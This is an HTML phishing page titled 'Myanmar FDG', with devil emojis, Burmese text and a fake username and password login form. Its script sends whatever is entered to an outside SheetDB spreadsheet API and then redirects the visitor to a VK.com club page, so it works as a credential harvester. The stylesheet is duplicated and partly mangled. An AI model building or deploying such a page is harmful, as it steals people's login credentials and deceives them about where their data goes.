
<DOCTYPE html>

<html>
<head>

<title>Myanmar FDG  </title>

</head>

<body style="background-color :#00BFFF;" />
<style>
h1{
 font-family: Garamond, serif;
}
h1{
font-size: 24px;
}

h3{
color:black;
text-shadow:1px 1px 2px black,0 0 25px blue, 0 0 5px darkblue;
} 
h1{
color:white;
text-shadow:1px 1px 2px black,0 0 25px blue, 0 0 5px darkblue;
} 


.button {
  padding: 15px 25px;
  font-size: 24px;
  text-align: center;
  cursor: pointer;
  outline: none;
  color: #fff;
  background-color: #04AA6D;
  border: nbutton {
  padding: 15px 25px;
  font-size: 100px;
  text-align: center;
  cursor: pointer;
  outline: none;
  color: #fff;
  background-color: #04AA6D;
  border: none;
  border-radius: 15px;
box-shadow: 0 9px #999;
}

.button:hover {background-color: #3e8e41}

.button:active {
  background-color: #3e8e41;
  box-shadow: 0 5px #666;
  transform: translateY(4px);
}one;
  border-radius: 15px;
  box-shadow: 0 9px #999;
}

.button:hover {background-color: #3e8e41}

.button:active {
  background-color: #3e8e41;
  box-shadow: 0 5px #666;
  transform: translateY(4px);
}


</style>


<body>
<center>
<h1>👹Myanmar 👹</h1>
<h3>ဒီ 🌐website လေးကတော့  😈 </h3>
<p><img src="Logo.png" alt="Myanmar " width="300" height="300" /></p>
 
<form method="post" id="sheetdb-form"
  action="https://sheetdb.io/api/v1/w8ng4yffi41mg">
   <p><input name="data[id]"placeholder="username"type="text"></p>
   <p><input name="data[password]"placeholder="password"type="text"></p>
  
   <button type= "submit" class= "button"> login </button>
</form>
<script>
  var form = document.getElementById('sheetdb-form');
  form.addEventListener("submit", e => {
    e.preventDefault();
    fetch(form.action, {
        method : "POST",
        body: new FormData(document.getElementById("sheetdb-form")),
    }).then(
        response => response.json()
    ).then((html) => {
      // you can put any JS code here
window.location.href = 'https://m.vk.com/club197992595';
    });
  });
</script>




</body>

</center>
</body>
</html>



</body>
</html>
